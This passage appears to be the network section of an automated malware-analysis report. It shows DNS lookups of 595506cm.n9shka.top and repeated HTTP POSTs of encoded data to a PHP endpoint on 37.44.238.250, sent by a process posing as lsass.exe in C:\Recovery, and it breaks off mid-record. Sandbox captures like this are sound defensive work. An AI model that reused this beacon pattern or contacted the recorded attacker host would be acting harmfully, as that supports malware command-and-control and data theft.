Dec 6, 2024 01:43:40.039865017 CET	49844	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:40.040225029 CET	49844	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:40.158046007 CET	80	49844	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:40.398958921 CET	49844	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:40.519561052 CET	80	49844	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:41.333076000 CET	80	49844	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:41.383131027 CET	49844	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:41.565629005 CET	80	49844	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:41.617464066 CET	49844	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:41.829552889 CET	49844	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:52.686722994 CET	49872	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:52.801738024 CET	80	49872	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:52.801824093 CET	49872	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:52.802166939 CET	49872	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:52.926929951 CET	80	49872	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:53.149029016 CET	49872	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:53.270814896 CET	80	49872	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:54.078912020 CET	80	49872	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:54.133125067 CET	49872	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:54.314062119 CET	80	49872	37.44.238.250	192.168.2.4
Dec 6, 2024 01:43:54.367511034 CET	49872	80	192.168.2.4	37.44.238.250
Dec 6, 2024 01:43:54.970590115 CET	49872	80	192.168.2.4	37.44.238.250

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 01:42:16.083574057 CET	55545	53	192.168.2.4	1.1.1.1
Dec 6, 2024 01:42:16.409004927 CET	53	55545	1.1.1.1	192.168.2.4
Dec 6, 2024 01:42:29.353069067 CET	54153	53	192.168.2.4	1.1.1.1
Dec 6, 2024 01:42:29.491080999 CET	53	54153	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2024 01:42:16.083574057 CET	192.168.2.4	1.1.1.1	0xe4e0	Standard query (0)	595506cm.n9shka.top	A (IP address)	IN (0x0001)	false
Dec 6, 2024 01:42:29.353069067 CET	192.168.2.4	1.1.1.1	0xb812	Standard query (0)	595506cm.n9shka.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 6, 2024 01:42:16.409004927 CET	1.1.1.1	192.168.2.4	0xe4e0	No error (0)	595506cm.n9shka.top		37.44.238.250	A (IP address)	IN (0x0001)	false
Dec 6, 2024 01:42:29.491080999 CET	1.1.1.1	192.168.2.4	0xb812	No error (0)	595506cm.n9shka.top		37.44.238.250	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

595506cm.n9shka.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	37.44.238.250	80	1368	C:\Recovery\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 01:42:16.532170057 CET	350	OUT	POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 595506cm.n9shka.top Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 01:42:16.883887053 CET	336	OUT	Data Raw: 05 06 01 01 06 00 01 00 05 06 02 01 02 05 01 07 00 0a 05 0b 02 03 03 0e 03 0f 0f 50 06 53 01 55 0d 02 04 0c 03 00 04 01 0d 03 07 05 07 01 04 00 07 02 0f 59 0e 05 05 0a 04 57 05 05 04 56 07 08 01 00 0a 0e 05 03 05 00 0c 50 0d 06 0d 0d 0e 01 05 50 Data Ascii: PSUYWVPPPRT\L~k^XNvqiLuKRkRetlhhMpJ{\|{Ho^vh}kPw\|N~_~V@zmz~_y
Dec 6, 2024 01:42:17.851090908 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 01:42:18.085515022 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 06 Dec 2024 00:42:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	37.44.238.250	80	3412	C:\Recovery\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 01:42:29.878978968 CET	350	OUT	POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 595506cm.n9shka.top Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 01:42:30.226990938 CET	336	OUT	Data Raw: 00 03 04 07 03 0c 01 00 05 06 02 01 02 05 01 0a 00 04 05 0d 02 06 03 01 00 00 0f 01 07 07 00 02 0d 55 06 00 01 0c 07 01 0b 00 07 07 00 07 05 02 07 02 0c 5e 0c 57 04 57 06 55 04 50 04 00 00 0e 03 06 0f 5e 07 00 07 02 0f 05 0c 54 0f 00 0f 06 06 03 Data Ascii: U^WWUP^TWRU\L~kpi[ca}Mae`O~liL`RRhMs_oRoxYi_}}sS`w]j_~V@{CbOey
Dec 6, 2024 01:42:31.150566101 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 01:42:31.385164022 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 06 Dec 2024 00:42:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	37.44.238.250	80	5804	C:\Recovery\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 01:42:38.667047024 CET	350	OUT	POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 595506cm.n9shka.top Content-Length: 328 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 01:42:39.023827076 CET	328	OUT	Data Raw: 05 05 01 05 03 0b 04 02 05 06 02 01 02 05 01 03 00 03 05 0b 02 00 03 08 03 0e 0e 06 04 0e 01 50 0c 03 07 09 00 06 04 04 0b 02 07 01 07 03 07 06 04 51 0c 5d 0d 50 04 05 04 53 03 05 06 56 04 09 01 02 0d 0b 07 06 04 01 0e 05 0c 57 0a 07 0f 00 05 03 Data Ascii: PQ]PSVW_WV\L~\|`Xt[uBbeRhjYtopOk]^KolwxzJSUvt\|Lje~V@B{}v__y
Dec 6, 2024 01:42:39.938740969 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 01:42:40.173212051 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 06 Dec 2024 00:42:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	37.44.238.250	80	1432	C:\Recovery\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 01:42:51.876773119 CET	333	OUT	POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 595506cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 01:42:52.226881981 CET	344	OUT	Data Raw: 00 04 04 07 06 0d 01 06 05 06 02 01 02 0d 01 07 00 07 05 0a 02 04 03 0e 03 0f 0e 54 06 53 06 05 0d 00 04 0c 03 03 07 05 0b 0b 05 04 05 07 06 0f 05 0a 0c 0f 0d 05 04 02 04 02 06 01 01 07 05 5f 02 50 0f 0d 07 54 07 07 0c 54 0b 0f 0f 0d 0e 54 06 54 Data Ascii: TS_PTTTTU\L}P\|a\trr\vu]ThRe`B{^\|]cYylxsvD}oRcY`}e~V@{}fO}ri
Dec 6, 2024 01:42:53.176539898 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 01:42:53.413290024 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 06 Dec 2024 00:42:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49762	37.44.238.250	80	3896	C:\Recovery\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 01:43:05.251240015 CET	297	OUT	POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 595506cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 01:43:05.602046013 CET	344	OUT	Data Raw: 00 04 04 03 03 0f 01 02 05 06 02 01 02 04 01 0b 00 05 05 0c 02 06 03 0c 03 56 0d 50 06 54 06 08 0e 00 07 09 03 02 03 05 0c 06 07 04 07 57 04 02 07 04 0e 09 0c 57 06 06 04 0e 06 02 07 05 00 0c 02 01 0f 0b 05 52 04 54 0c 07 0e 02 0c 07 0c 55 05 57 Data Ascii: VPTWWRTUWRSV\L~pPMcan]wv`hRi`B^BkcZxlsH{yX\|SsPcgZ~_~V@@z}n}\a
Dec 6, 2024 01:43:06.552253008 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 01:43:06.785408974 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 06 Dec 2024 00:43:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49781	37.44.238.250	80	5144	C:\Recovery\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 01:43:13.771759033 CET	297	OUT	POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 595506cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 01:43:14.117568970 CET	344	OUT	Data Raw: 00 0a 01 05 03 0d 04 01 05 06 02 01 02 06 01 00 00 01 05 0d 02 03 03 0a 02 01 0a 01 04 03 01 02 0a 02 03 09 07 01 06 00 0e 06 07 54 05 07 07 0f 03 0a 0c 59 0a 01 01 0a 04 04 04 0d 06 00 07 5a 03 02 0c 0f 07 53 07 04 0b 04 0e 54 0f 56 0e 01 07 01 Data Ascii: TYZSTVYPWQ\L}Rsb`buae\|~e`RYMsXxBlcvIhm{Pcdle~V@BxC~~Ly
Dec 6, 2024 01:43:15.043996096 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 01:43:15.297533989 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 06 Dec 2024 00:43:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49801	37.44.238.250	80	3964	C:\Recovery\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 01:43:22.231400967 CET	333	OUT	POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 595506cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 01:43:22.586354017 CET	344	OUT	Data Raw: 00 02 01 06 06 01 01 04 05 06 02 01 02 07 01 02 00 06 05 0c 02 0d 03 0a 00 56 0e 00 04 0e 03 57 0c 00 04 01 00 56 04 50 0e 50 05 0a 04 05 04 56 04 06 0d 0c 0f 57 06 07 01 0e 05 0c 04 0a 04 0f 00 07 0d 00 05 56 06 08 0b 00 0e 02 0f 00 0d 03 04 54 Data Ascii: VWVPPVWVTPP\L}T`P@`}buwR\|Rut`h]w^yxXlz\|CxAwo_iO~V@Axmbby
Dec 6, 2024 01:43:23.535892010 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 01:43:23.769431114 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 06 Dec 2024 00:43:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49823	37.44.238.250	80	4128	C:\Recovery\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 01:43:31.492314100 CET	285	OUT	POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 595506cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 01:43:31.852133989 CET	344	OUT	Data Raw: 05 05 04 02 06 0c 04 00 05 06 02 01 02 01 01 04 00 0b 05 0f 02 0d 03 00 03 00 0f 56 04 57 01 57 0f 00 04 0d 07 0d 03 04 0b 07 06 04 05 01 05 0f 03 05 0f 01 0f 55 07 0a 01 03 03 01 05 01 04 58 05 07 0a 0b 04 01 07 51 0b 02 0f 04 0f 01 0d 02 04 07 Data Ascii: VWWUXQVW\L~~sfw\P_a[kPRSBvc_kp`lRdZx~Ik`c^`Ni_~V@{CPbW
Dec 6, 2024 01:43:32.761173964 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 01:43:32.993482113 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 06 Dec 2024 00:43:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49844	37.44.238.250	80	5652	C:\Recovery\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 01:43:40.040225029 CET	333	OUT	POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 595506cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 01:43:40.398958921 CET	344	OUT	Data Raw: 05 02 01 07 06 0c 04 00 05 06 02 01 02 0c 01 06 00 07 05 0e 02 0c 03 09 01 01 0d 56 05 03 03 52 0d 51 07 59 03 04 04 0a 0e 51 06 05 07 50 07 0e 04 07 0e 5e 0e 05 07 03 05 57 07 54 07 07 07 58 03 0a 0e 0c 00 00 01 04 0e 54 0f 03 0d 04 0d 02 04 04 Data Ascii: VRQYQP^WTXTT[\L}Pkpu^wbqa[hRivohcp{lsl`v\|}{Qvwxe~V@{mfru
Dec 6, 2024 01:43:41.333076000 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 01:43:41.565629005 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 06 Dec 2024 00:43:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49872	37.44.238.250	80	3068	C:\Recovery\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 01:43:52.802166939 CET	332	OUT	POST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 595506cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 01:43:53.149029016 CET	344	OUT	Data Raw: 05 01 04 04 06 0a 04 00 05 06 02 01 02 06 01 05 00 07 05 09 02 07 03 0e 03 07 0e 01 03 06 01 57 0f 00 03 0e 02 56 06 02 0d 05 07 0b 07 0a 07 04 04 50 0b 0b 0c 04 04 05 05 07 03 00 06 52 05 0a 02 00 0f 0a 04 05 01 04 0e 07 0c 00 0c 06 0e 03 07 06 Data Ascii: WVPRXQP\L~AhYjOvquuelA~l}`Ut~pkYy\|tXlNW^hT\|NwIk^~e~V@B{SfN}Li
Dec 6, 2024 01:43:54.078912020 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 01:43:54.314062119 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 06 Dec 2024 00:43:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 